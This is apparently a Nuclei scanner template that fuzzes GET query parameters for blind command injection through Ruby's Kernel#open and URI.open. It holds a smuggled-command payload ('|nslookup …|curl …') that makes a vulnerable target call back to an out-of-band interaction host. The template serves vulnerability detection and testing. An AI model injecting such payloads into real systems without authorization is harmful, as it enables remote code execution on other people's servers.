40 lines
1.2 KiB
YAML
40 lines
1.2 KiB
YAML
id: cmdi-ruby-open-rce
|
|
|
|
info:
|
|
name: Ruby Kernel#open/URI.open RCE
|
|
author: pdteam
|
|
severity: high
|
|
description: |
|
|
Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open.
|
|
reference:
|
|
- https://bishopfox.com/blog/ruby-vulnerabilities-exploits
|
|
- https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/
|
|
metadata:
|
|
max-request: 1
|
|
tags: cmdi,oast,dast,blind,ruby,rce
|
|
|
|
variables:
|
|
marker: "{{interactsh-url}}"
|
|
|
|
http:
|
|
- pre-condition:
|
|
- type: dsl
|
|
dsl:
|
|
- 'method == "GET"'
|
|
|
|
stop-at-first-match: true
|
|
payloads:
|
|
interaction:
|
|
- "|nslookup {{marker}}|curl {{marker}}"
|
|
|
|
fuzzing:
|
|
- part: query
|
|
fuzz:
|
|
- "{{interaction}}"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "dns"
|
|
# digest: 490a004630440220424a72be2b73d7cb1af746905a58c5e09a4f4a4a4b1426742a5cf4f958f0ba6a02200a7a101e4035dee4feaadf003a37eb1e4d8f3ecca542337e5dc9767075863334:922c64590222798bb761d5b6d8e72950 |